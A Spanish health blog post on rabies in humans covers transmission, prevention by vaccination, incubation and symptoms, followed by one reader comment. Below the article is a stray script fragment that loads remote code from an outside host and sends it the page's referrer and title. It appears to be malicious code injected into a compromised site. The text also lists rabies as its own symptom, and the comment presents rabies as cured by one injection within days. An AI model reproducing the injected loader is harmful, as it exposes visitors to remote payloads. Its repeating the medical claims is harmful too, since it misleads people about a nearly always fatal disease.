Salud y belleza » Enfermedades, Productos peligrosos, Salud

La rabia en seres humanos

1 Comentario

zoonosis-humanaLos perros son la principal fuente de infección de la rabia en humanos, aunque puede provenir también de otros animales domésticos y salvajes. El contagio se produce por el contacto con la saliva infectada y también a través de mordeduras y arañazos. El único lugar del mundo que no presenta casos de rabia es la Antártida. En Asia y África se registra el mayor porcentaje de muertes por rabia y en Estados Unidos y Canadá los murciélagos son la principal fuente de infección de la rabia.

El mejor mecanismo de prevención de la rabia es la vacunación, por eso en sectores de población pobres y vulnerables se extiende mayormente esta enfermedad.

De media, la rabia puede incubar de 1 a 3 meses, aunque hay casos en los que puede tardar de una semana a un año. Los síntomas de esta enfermedad son la rabia, dolor, hormigueo y picor en la herida.

Si el virus se propaga por el cuerpo, se inflama el sistema nervioso central, también el cerebro y la médula espinal y esto produce la muerte. Aquellas personas que padecen la rabia normalmente también suelen presentar signos de hiperactividad y excitación.

rabia-en-humanos

En muchos casos el mayor problema de esta enfermedad es que sus síntomas se suelen confundir con otras dolencias y afecciones, por lo que se suele hacer un mal diagnóstico y se pone en peligro la vida del paciente al no tratarlo a tiempo.

¿Conoces algún caso de rabia en humanos? ¿Cómo terminó?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }

Más consejos de salud y belleza : , ,

One Comment »

  • juana said:

    Una vez me mordió mi gato y me pegó la rabia. Se me inflamó la mano pero me pusieron una inyección y en unos días se quitó. No quiero ni pensar si le hubiera pasado ahora a alguno de mis hijos qué haría… por eso ahora siempre los vacuno a mis animales para prevenir.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.